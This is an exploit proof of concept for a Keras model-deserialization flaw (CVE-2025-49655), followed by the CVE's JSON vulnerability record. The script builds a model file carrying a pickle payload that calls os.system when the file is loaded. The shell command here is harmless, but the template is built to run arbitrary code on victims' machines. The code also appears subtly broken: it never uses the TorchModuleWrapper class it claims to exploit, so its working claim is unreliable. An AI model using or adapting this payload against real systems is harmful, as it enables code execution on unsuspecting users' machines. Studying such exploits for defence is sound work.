CVE-2025-49655

# CVE-2025-49655 PoC - Keras Deserialization RCE via TorchModuleWrapper # This PoC demonstrates how to create a malicious Keras file that # executes arbitrary code when loaded, bypassing safe_mode. import os import pickle import keras from keras.layers import Layer # Step 1: Define a malicious payload class class MaliciousPayload: """Malicious class that executes code during deserialization""" def __reduce__(self): # Command to execute on victim's system cmd = "echo 'PWNED: Arbitrary code executed via CVE-2025-49655' && touch /tmp/cve_2025_49655_pwned" return (os.system, (cmd,)) # Step 2: Create a custom layer that wraps the malicious payload class MaliciousTorchWrapper(Layer): def __init__(self, **kwargs): super().__init__(**kwargs) # Embed malicious payload in the layer configuration self.payload = MaliciousPayload() def call(self, inputs): return inputs # Step 3: Build a simple model with the malicious layer model = keras.Sequential([ keras.layers.Input(shape=(10,)), MaliciousTorchWrapper(), keras.layers.Dense(1, activation='sigmoid') ]) # Step 4: Save the malicious model model.save('malicious_model.keras') print("[+] Malicious Keras model saved as 'malicious_model.keras'") # Step 5: Demonstrate exploitation - loading triggers code execution print("[*] When victim loads this file with Keras 3.11.0-3.11.2:") print(" keras.models.load_model('malicious_model.keras', safe_mode=True)") print(" -> Arbitrary code executes despite safe_mode being enabled!") # Alternative: Direct exploitation via load_model # keras.models.load_model('malicious_model.keras') # Triggers RCE

{"cve": {"id": "CVE-2025-49655", "sourceIdentifier": "6f8de1f0-f67e-45a6-b68f-98777fdb759c", "published": "2025-10-17T16:15:37.420", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Deserialization of untrusted data can occur in versions of the Keras framework running versions 3.11.0 up to but not including 3.11.3, enabling a maliciously uploaded Keras file containing a TorchModuleWrapper class to run arbitrary code on an end user’s system when loaded despite safe mode being enabled. The vulnerability can be triggered through both local and remote files."}], "metrics": {"cvssMetricV31": [{"source": "6f8de1f0-f67e-45a6-b68f-98777fdb759c", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "6f8de1f0-f67e-45a6-b68f-98777fdb759c", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://github.com/keras-team/keras/pull/21575", "source": "6f8de1f0-f67e-45a6-b68f-98777fdb759c"}, {"url": "https://hiddenlayer.com/sai_security_advisor/2025-10-keras/", "source": "6f8de1f0-f67e-45a6-b68f-98777fdb759c"}]}}